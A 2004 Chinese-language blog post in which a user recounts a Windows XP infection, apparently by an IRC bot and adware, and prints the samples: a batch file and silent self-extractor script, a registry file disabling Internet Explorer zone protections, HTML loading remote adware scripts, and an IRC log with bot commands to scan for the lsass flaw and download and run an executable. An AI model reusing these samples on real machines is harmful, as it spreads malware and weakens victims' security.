软件工程

本类阅读TOP10
·PHP4 + MYSQL + APACHE 在 WIN 系统下的安装、配置
·Linux 入门常用命令(1)
·Linux 入门常用命令(2)
·使用 DCPROMO/FORCEREMOVAL 命令强制将 Active Directory 域控制器降级
·DirectShow学习(八): CBaseRender类及相应Pin类的源代码分析
·基于ICE方式SIP信令穿透Symmetric NAT技术研究
·Windows 2003网络负载均衡的实现
·一网打尽Win十四种系统故障解决方法
·数百种 Windows 软件的免费替代品列表
·收藏---行百里半九十

分类导航
VC语言Delphi
VB语言ASP
PerlJava
Script数据库
其他语言游戏开发
文件格式网站制作
软件工程.NET开发
window自动升级惹的祸

作者:未知 来源:月光软件站 加入时间:2005-2-28 月光软件站

我刚刚装的是winxpsp1(9394)英文版,本想升级打补丁,无奈遇到如下情况。
1,首先在在系统盘c盘中发现多了五个文件:sex.bat,sex.html,sex.REG,xfks.exe,autoexec.sys.
2,我是在装Norton AntiVirus 2004,正在升级病毒库时,突然被关闭,并且调不出任务栏,包括msconfig或regedit等一系列能修改启动信息的命令。
3,无奈,幸好有备份,于是ghost恢复,半天……,恢复成功,再次进入系统,没问题。
4,这一次,我先安装Norton AntiVirus 2004,然后重启,本以为一切都好了,当我再次升级病毒库时,又是无缘无故停止,同时调不出任务栏,包括msconfig或regedit等一系列能修改启动信息的命令。靠,受不了了,这可是新的系统呀!除了Norton,什么也没装,并且除了运行Norton升级程序之外,什么也没运行。怪!!这次我没有再ghost恢复系统,而是安装了dream tools虚拟光驱(缘由见结尾),竟然可以安装,意外,惊喜之余,想到了Windows优化大师的进程管理,于是便down了。还真行,可疑进程
如下:

////////////////////////////////////////////////////
进程快照列表:
进程10:C:\WINDOWS\System32\msie.exe(优先级:普通)。
进程12:C:\WINDOWS\System32\pqznks.exe(优先级:普通),
进程16:C:\WINDOWS\System32\wuauclt.exe(优先级:普通)是两个,用户,系统,
进程18:C:\WINDOWS\System32\wuauclt.exe(优先级:普通)
////////////////////////////////////////////////
5,还等什么,关吧!于是任务栏,包括msconfig或regedit等一系列能修改启动信息的命令都出来了,启动信息发现pqznks.exe和msie.exe这两个特殊的信息,于是在注册表中
如下:

//////////////////////////////////////////////////////////
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
 "Microsoft Update"="sys32cfg.exe"
 "Windows Media Player"="pfnqej.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Windows Media Player"="pfnqej.exe"
//////////////////////////////////////////////
分别删除(包括启动菜单的一系列本人知道和启动有关的地方),本以为一切ok了,并且这次重新启动之前,我把Automatic Updates服务给关了。
6,再次启动,很快,比上一次快多了,这次一切正常,松了口气,你一定很奇怪,我为何把Automatic Updates服务给关了,那是我把sex.html用文本打开看了看,猜得,
如下:

////////////////////////////////////////////////
{<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript" src="http://public.windupdates.com/prompt.php?h=4c61edcf03409c697281ebf521f23d9bdf4800d3599eab0ccc480b5bb792a6b0ffdcb7431db5dcc86539b2e1c125f0d772929d6af614343aec9a5f&k=75819fd8dbf15e67104533b354c8e59d"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->
<html>
<head>
<!-- BEGIN MEDIATICKETS HEADER -->
<iframe id="content" style="position:absolute; visibility:hidden;"></iframe>
<script language="JavaScript" src="http://www.mt-download.com/mtrslib2.js"></script>
<script language="JavaScript">
mtrslib_uid = '3728';
mtrslib_retry = 1;
mt_set_onload();
</script>
<!-- END MEDIATICKETS HEADER -->

<Title>about blank</title>
</head>
<body>
<!-- AUTO_PROMPT AD START -->
<script language="JavaScript" type="text/JavaScript" src="http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&retry=2&loadfirst=1&account_id=153636&delayload=0&adid=a1093699971"></script>
<script language="JavaScript">self.focus();</script><!-- AUTO_PROMPT AD END -->

</body>
</html>}
///////////////////////////////////////////////
7本人看不太懂,正在学习中,大概意思有自动运行升级程序,所以索性关了。再次上网,这次Norton升级很顺利,因为没升级之前,我用Norton扫了一下我收藏的那四个文件,首先提示病毒库太旧,要更新,我没理,可是没反应。那会行,那可是Norton呀!好奇之于,我升级,再次扫描,这一次有提示:
如下:

///////////////////////////////////////////////////////////////////
类别: 威胁警报
日期,功能,威胁名,操作及结果,项目类型,目标,可疑的操作,病毒定义版本,产品版本,用户名,计算机名,详细信息
9/5/2004 11:58:34 PM,??????,Adware.CDT,????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别:广告软件源:C:\Documents and Settings\ijake\Local Settings\Temporary Internet Files\Content.IE5\6F85QTQV\xfk[1].exe,说明:文件 C:\Documents and Settings\ijake\Local Settings\Temporary Internet Files\Content.IE5\6F85QTQV\xfk[1].exe 是一个 广告软件 威胁。"
9/5/2004 11:58:34 PM,??????,Adware.CDT,????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别:广告软件源:C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\6F85QTQV\xfk[1].exe,说明:文件 C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\6F85QTQV\xfk[1].exe 是一个 广告软件 威胁。"
9/5/2004 11:43:43 PM,????,W32.Spybot.Worm,??????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,源:C:\WINDOWS\SYSTEM32\SYS32CFG.EXE
9/5/2004 11:39:51 PM,??????,Adware.CDT,????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别:广告软件源:C:\jok\xfks.exe,说明:文件 C:\jok\xfks.exe 是一个 广告软件 威胁。"
9/5/2004 11:39:51 PM,??????,Adware.CDT,????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别:广告软件源:C:\jok\sex.REG,说明:文件 C:\jok\sex.REG 是一个 广告软件 威胁。"
9/5/2004 11:39:51 PM,??????,Adware.CDT,????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别:广告软件源:C:\jok\sex.html,说明:文件 C:\jok\sex.html 是一个 广告软件 威胁。"
9/5/2004 11:39:51 PM,??????,Adware.CDT,????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别:广告软件源:C:\jok\sex.bat,说明:文件 C:\jok\sex.bat 是一个 广告软件 威胁。"
9/5/2004 11:37:52 PM,??????,Adware.CDT,???,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别:广告软件源:C:\jok\xfks.exe,说明:文件 C:\jok\xfks.exe 是一个 广告软件 威胁。"
9/5/2004 11:37:52 PM,??????,Adware.CDT,???,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别:广告软件源:C:\jok\sex.REG,说明:文件 C:\jok\sex.REG 是一个 广告软件 威胁。"
9/5/2004 11:37:52 PM,??????,Adware.CDT,???,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别:广告软件源:C:\jok\sex.html,说明:文件 C:\jok\sex.html 是一个 广告软件 威胁。"
9/5/2004 11:37:52 PM,??????,Adware.CDT,???,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别:广告软件源:C:\jok\sex.bat,说明:文件 C:\jok\sex.bat 是一个 广告软件 威胁。"
9/5/2004 11:37:31 PM,??????,Adware.CDT,?????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别:广告软件源:C:\jok\xfks.exe,说明:文件 C:\jok\xfks.exe 是一个 广告软件 威胁。"
9/5/2004 11:37:31 PM,??????,Adware.CDT,?????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别:广告软件源:C:\jok\sex.REG,说明:文件 C:\jok\sex.REG 是一个 广告软件 威胁。"
9/5/2004 11:37:31 PM,??????,Adware.CDT,?????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别:广告软件源:C:\jok\sex.html,说明:文件 C:\jok\sex.html 是一个 广告软件 威胁。"
9/5/2004 11:37:31 PM,??????,Adware.CDT,?????,??,N/A,N/A,200409010016,10.0.10.13,ijake,CHINA-SQIDAABQN,",威胁类别:广告软件源:C:\jok\sex.bat,说明:文件 C:\jok\sex.bat 是一个 广告软件 威胁。
///////////////////////////////////////////////////////////////////
问题是删除不掉,迷茫,只好手动删了。
8,发现问题了,也解决了。想了想,不可能微软的网站被黑了吧!!??于是就又一次启动自动升级,与此同时,去网上搜搜相关信息,郁闷,没有,又去了Norton官方网站,金山,瑞星,看了看最新的病毒库,没有。心里不甘,于是,想到到csdn发个帖子,和众高手讨论讨论,学习学习,正写着呢!又来了,老规矩!调不出任务栏,包括msconfig或regedit等一系列能修改启动信息的命令。更郁闷,不过,这次较确定(个人看法)是升级的是,于是,没有关它的启动信息,想看看它到底怎么一回事??!!重启之后,发现了更好玩的window不断的安装同一个文件是微软的两个补丁,总共3.1m(编号没记住),如果我不把pfnqej.exe这进程关了,它就一直在装。真好玩,that's so funny! 我在那自嘲,这一次又看了看启动信息有变化,
如下:

/////////////////////////////////////////////////////////////////////////////
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"Microsoft Ansti Update"="msie.exe"
"Windows Media Player"="pqznks.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Windows Media Player"="pqznks.exe"
//////////////////////////////////////////////////////////////////////////
于是怀疑是不是变种病毒??不知道…………以后还敢不敢升级了…………会不会微软专门针对非正版用户(在我的概念里没有盗版之说,在这澄清一下)所专门设置的??…………头都大了!!还是问大家吧!为了方便大家研究附一些信息:
(个人观点)

///////////////////////////////////////////////////
主要是xfks.exe这个55.9kb的winrar自解压文件,
注释为:
***********************************************
;The comment below contains SFX script commands

Path=C:\
SavePath
Setup=sex.bat
Silent=1
Overwrite=1
***********************************************
里边有三个文件:
sex.bat,sex.html,sex.REG。

sex.bat如下:
******************
@echo off

REGEDIT.EXE /S sex.REG

cls

sex.html

exit
******************
sex.html上面已给出
sex.REG如下:
***************************************************************************************************
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1004"=dword:00000000
"1201"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1004"=dword:00000000
"1201"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1004"=dword:00000000
"1201"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1004"=dword:00000000
"1201"=dword:00000000
"1406"=dword:00000000
"1A04"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1004"=dword:00000000
"1201"=dword:00000000
"1001"=dword:00000000
"1200"=dword:00000000
"1400"=dword:00000000
"1606"=dword:00000000
"1607"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults]
"http"=dword:00000000
********************************************************************************************************
不知道是这是什么目的??
其中,在硬盘中搜msie.exe时发现msieftp.dll,MSIE.EXE-30E658AA.pf文件,可不知道如何打开*.dll,*.pf文件,望大虾告知,并且Norton警告时是Adware.CDT这个标示,到Norton官方网站搜一下,有很多信息,如需要,下次我会有选择发一些。
还有就是autoexec.sys如下:
***********************************************************************************************************************************************
NICK [RX]|733688
USER iuwibm 0 0 :[RX]|733688
:We.Are.From.Mars2 NOTICE [RX]|733688 :*** If you are having problems connecting due to ping timeouts, please type /quote pong 8264A5 or /raw pong 8264A5 now.
PING :8264A5
PONG :8264A5
JOIN #yourspace opens
:We.Are.From.Mars2 001 [RX]|733688 :Welcome to the We Are From Mars IRC Network [RX]|[email protected]
USERHOST [RX]|733688
MODE [RX]|733688 -x+B
JOIN #yourspace opens
:We.Are.From.Mars2 002 [RX]|733688 :Your host is We.Are.From.Mars2, running version Unreal3.2
:We.Are.From.Mars2 003 [RX]|733688 :This server was created Wed Apr 28 18:15:19 2004
:We.Are.From.Mars2 004 [RX]|733688 We.Are.From.Mars2 Unreal3.2 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzNT
:We.Are.From.Mars2 005 [RX]|733688 MAP KNOCK SAFELIST HCN MAXCHANNELS=1 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=20 AWAYLEN=307 :are supported by this server
USERHOST [RX]|733688
MODE [RX]|733688 -x+B
JOIN #yourspace opens
:We.Are.From.Mars2 005 [RX]|733688 WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=We-Are-From-Mars CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server
USERHOST [RX]|733688
MODE [RX]|733688 -x+B
JOIN #yourspace opens
:We.Are.From.Mars2 251 [RX]|733688 :There are 7 users and 10912 invisible on 17 servers
:We.Are.From.Mars2 252 [RX]|733688 17 :operator(s) online
:We.Are.From.Mars2 253 [RX]|733688 3 :unknown connection(s)
:We.Are.From.Mars2 254 [RX]|733688 16 :channels formed
:We.Are.From.Mars2 255 [RX]|733688 :I have 1099 clients and 1 servers
:We.Are.From.Mars2 265 [RX]|733688 :Current Local Users: 1099  Max: 2845
:We.Are.From.Mars2 266 [RX]|733688 :Current Global Users: 10919  Max: 13845
:We.Are.From.Mars2 375 [RX]|733688 :- We.Are.From.Mars2 Message of the Day -
:We.Are.From.Mars2 372 [RX]|733688 :- 17/8/2004 10:34
:We.Are.From.Mars2 372 [RX]|733688 :- No Spamming, Packeting, DoS'ing, or Sending Viruses
:We.Are.From.Mars2 372 [RX]|733688 :- No harassing other Users at all
:We.Are.From.Mars2 372 [RX]|733688 :- When Caught u will be Removed from the Network.
:We.Are.From.Mars2 372 [RX]|733688 :-
:We.Are.From.Mars2 372 [RX]|733688 :- No Botnets Allowed On This Irc Network
:We.Are.From.Mars2 372 [RX]|733688 :-
:We.Are.From.Mars2 372 [RX]|733688 :- THIS NETWORK IS IN ACCORDANCE WITH THE INTERNET PRIVACY ACT.
:We.Are.From.Mars2 372 [RX]|733688 :- If you enter this Internet Relay Chat Server and channels and are a member of any
:We.Are.From.Mars2 372 [RX]|733688 :-  government agency, the MPAA, RIAA, the music industry, any law enforcement agenc
:We.Are.From.Mars2 372 [RX]|733688 :- y, the software industry, or any legal firm, then :you are violating code 431.322
:We.Are.From.Mars2 372 [RX]|733688 :- .12 of the Internet Privacy Act signed by Bill Clinton in 1995 and MUST leave imm
:We.Are.From.Mars2 372 [RX]|733688 :- ediately.
:We.Are.
From.Mars2 376 [RX]|733688 :End of /MOTD command.
:[RX]|733688 MODE [RX]|733688 :+iw
:[RX]|[email protected] JOIN :#yourspace
:We.Are.From.Mars2 332 [RX]|733688 #yourspace :.advscan lsass 100 5 0 -r -b -s
:We.Are.From.Mars2 333 [RX]|733688 #yourspace djfkkj 1094550088
:We.Are.From.Mars2 353 [RX]|733688 @ #yourspace :[RX]|733688 @djfkkj
:We.Are.From.Mars2 366 [RX]|733688 #yourspace :End of /NAMES list.
:We.Are.From.Mars2 302 [RX]|733688 :[RX]|[email protected]   
:We.Are.From.Mars2 NOTICE [RX]|733688 :BOTMOTD File not found
:[RX]|733688 MODE [RX]|733688 :+B
:We.Are.From.Mars2 405 [RX]|733688 #yourspace :You have joined too many channels
:We.Are.From.Mars2 302 [RX]|733688 :[RX]|[email protected]   
:We.Are.From.Mars2 405 [RX]|733688 #yourspace :You have joined too many channels
:We.Are.From.Mars2 302 [RX]|733688 :[RX]|[email protected]   
:We.Are.From.Mars2 405 [RX]|733688 #yourspace :You have joined too many channels
:[email protected] PRIVMSG [RX]|733688 :.login ysworld -s
:[email protected] PRIVMSG [RX]|733688 :.download http://www.animelegend.com/xfk.exe c:\xfks.exe 1 -s
PING :We.Are.From.Mars2
PONG :We.Are.From.Mars2
NICK [RX]|211872
USER yjlvzu 0 0 :[RX]|211872
:We.Are.From.Mars5 NOTICE [RX]|211872 :*** If you are having problems connecting due to ping timeouts, please type /quote pong F84DD41 or /raw pong F84DD41 now.
PING :F84DD41
PONG :F84DD41
JOIN #yourspace opens
:We.Are.From.Mars5 001 [RX]|211872 :Welcome to the We Are From Mars IRC Network [RX]|[email protected]
USERHOST [RX]|211872
MODE [RX]|211872 -x+B
JOIN #yourspace opens
:We.Are.From.Mars5 002 [RX]|211872 :Your host is We.Are.From.Mars5, running version Unreal3.2
:We.Are.From.Mars5 003 [RX]|211872 :This server was created Wed Apr 28 18:15:19 2004
:We.Are.From.Mars5 004 [RX]|211872 We.Are.From.Mars5 Unreal3.2 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzNT
:We.Are.From.Mars5 005 [RX]|211872 MAP KNOCK SAFELIST HCN MAXCHANNELS=1 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=20 AWAYLEN=307 :are supported by this server
USERHOST [RX]|211872
MODE [RX]|211872 -x+B
JOIN #yourspace opens
:We.Are.From.Mars5 005 [RX]|211872 WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=We-Are-From-Mars CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server
USERHOST [RX]|211872
MODE [RX]|211872 -x+B
JOIN #yourspace opens
:We.Are.From.Mars5 251 [RX]|211872 :There are 7 users and 10256 invisible on 17 servers
:We.Are.From.Mars5 252 [RX]|211872 17 :operator(s) online
:We.Are.From.Mars5 253 [RX]|211872 5 :unknown connection(s)
:We.Are.From.Mars5 254 [RX]|211872 16 :channels formed
:We.Are.From.Mars5 255 [RX]|211872 :I have 742 clients and 1 servers
:We.Are.From.Mars5 265 [RX]|211872 :Current Local Users: 742  Max: 1656
:We.Are.From.Mars5 266 [RX]|211872 :Current Global Users: 10263  Max: 13845
:We.Are.From.Mars5 375 [RX]|211872 :- We.Are.From.Mars5 Message of the Day -
:We.Are.From.Mars5 372 [RX]|211872 :- 17/8/2004 12:34
:We.Are.From.Mars5 372 [RX]|211872 :- No Spamming, Packeting, DoS'ing, or Sending Viruses
:We.Are.From.Mars5 372 [RX]|211872 :- No harassing other Users at all
:We.Are.From.Mars5 372 [RX]|211872 :- When Caught u will be Removed from the Network.
:We.Are.From.Mars5 372 [RX]|211872 :-
:We.Are.From.Mars5 372 [RX]|211872 :- No Botnets Allowed On This Irc Network
:We.Are.From.Mars5 372 [RX]|211872 :-
:We.Are.From.Mars5 372 [RX]|211872 :- THIS NETWORK IS IN ACCORDANCE WITH THE INTERNET PRIVACY ACT.
:We.Are.From.Mars5 372 [RX]|211872 :- If you enter this Internet Relay Chat Server and channels and are a member of any
:We.Are.From.Mars5 372 [RX]|211872 :-  government agency, the MPAA, RIAA, the music industry, any law enforcement agenc
:We.Are.From.Mars5 372 [RX]|211872 :- y, the software industry, or any legal firm, then :you are violating code 431.322
:We.Are.From.Mars5 372 [RX]|211872 :- .12 of the Internet Privacy Act signed by Bill Clinton in 1995 and MUST leave imm
:We.Are.From.Mars5 372 [RX]|211872 :- ediately.
:We.Are.Fr
om.Mars5 376 [RX]|211872 :End of /MOTD command.
:[RX]|211872 MODE [RX]|211872 :+iw
:[RX]|[email protected] JOIN :#yourspace
:We.Are.From.Mars5 332 [RX]|211872 #yourspace :.advscan lsass 100 5 0 -r -b -s
:We.Are.From.Mars5 333 [RX]|211872 #yourspace djfkkj 1094550088
:We.Are.From.Mars5 353 [RX]|211872 @ #yourspace :[RX]|211872 @djfkkj
:We.Are.From.Mars5 366 [RX]|211872 #yourspace :End of /NAMES list.
:We.Are.From.Mars5 302 [RX]|211872 :[RX]|[email protected]   
:We.Are.From.Mars5 NOTICE [RX]|211872 :BOTMOTD File not found
:[RX]|211872 MODE [RX]|211872 :+B
:We.Are.From.Mars5 405 [RX]|211872 #yourspace :You have joined too many channels
:We.Are.From.Mars5 302 [RX]|211872 :[RX]|[email protected]   
:We.Are.From.Mars5 405 [RX]|211872 #yourspace :You have joined too many channels
:We.Are.From.Mars5 302 [RX]|211872 :[RX]|[email protected]   
:[email protected] PRIVMSG [RX]|211872 :.login ysworld -s
:[email protected] PRIVMSG [RX]|211872 :.download http://www.animelegend.com/xfk.exe c:\xfks.exe 1 -s
:We.Are.From.Mars5 405 [RX]|211872 #yourspace :You have joined too many channels
PING :We.Are.From.Mars5
PONG :We.Are.From.Mars5
PRIVMSG #yourspace-e :[lsass]: Exploiting IP: 219.157.125.42.
:We.Are.From.Mars5 401 [RX]|211872 #yourspace-e :No such nick/channel
**********************************************************************************************************************************************
不过也不排除这是别人放的恶意木马,我这样想……………………
缘由:
…………………………………………………………………………
我的操作系统盘,除winxpsp1(9394)英文版,winme之外,其它都被朋友和同学拿走了,自己只剩硬盘上的镜像,要装其它系统eg:windows 2000sp4需要虚拟光驱将文件拷贝出来,说到这,我从硬盘上直接装2000,装不上,说c盘有错误,可是装winme可以,无奈winme频频死机,只好装珍藏的winxpsp1(9394)英文版了,把c盘分区删了,再创建,就可以了,怪!?
…………………………………………………………………………
有兴趣的朋友可以email联系:[email protected]
待续………………

                                         3:44 AM 9/6/2004

 

 


 

相关文章

相关软件